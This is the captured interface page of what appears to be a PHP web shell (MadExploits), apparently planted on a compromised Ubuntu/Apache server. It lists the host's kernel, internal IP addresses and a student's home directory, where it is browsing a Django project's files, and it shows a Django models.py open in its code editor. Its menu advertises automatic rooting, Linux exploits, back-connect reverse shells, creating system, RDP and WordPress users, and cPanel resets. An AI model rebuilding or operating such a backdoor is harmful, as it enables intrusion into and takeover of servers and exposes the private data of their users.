Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
soni24140@iiitd.edu.in /
capstone-main /
team /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
migrations
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
admin.py
96
B
-rw-r--r--
apps.py
83
B
-rw-r--r--
forms.py
229
B
-rw-r--r--
models.py
603
B
-rw-r--r--
tests.py
60
B
-rw-r--r--
urls.py
436
B
-rw-r--r--
utils.py
316
B
-rw-r--r--
views.py
702
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : models.py
from django.db import models class TeamMember(models.Model): DEGREE_CHOICES = [ ('phd', 'PhD'), ('mtech', 'MTech'), ('btech', 'BTech'), ('alumni', 'Alumni'), ] name = models.CharField(max_length=100) degree = models.CharField(max_length=10, choices=DEGREE_CHOICES) year = models.CharField(max_length=10, blank=True) current_affiliation = models.CharField(max_length=200, blank=True) profile_photo = models.ImageField(upload_to='team_photos/', blank=True) bio = models.TextField(blank=True) def __str__(self): return self.name
Close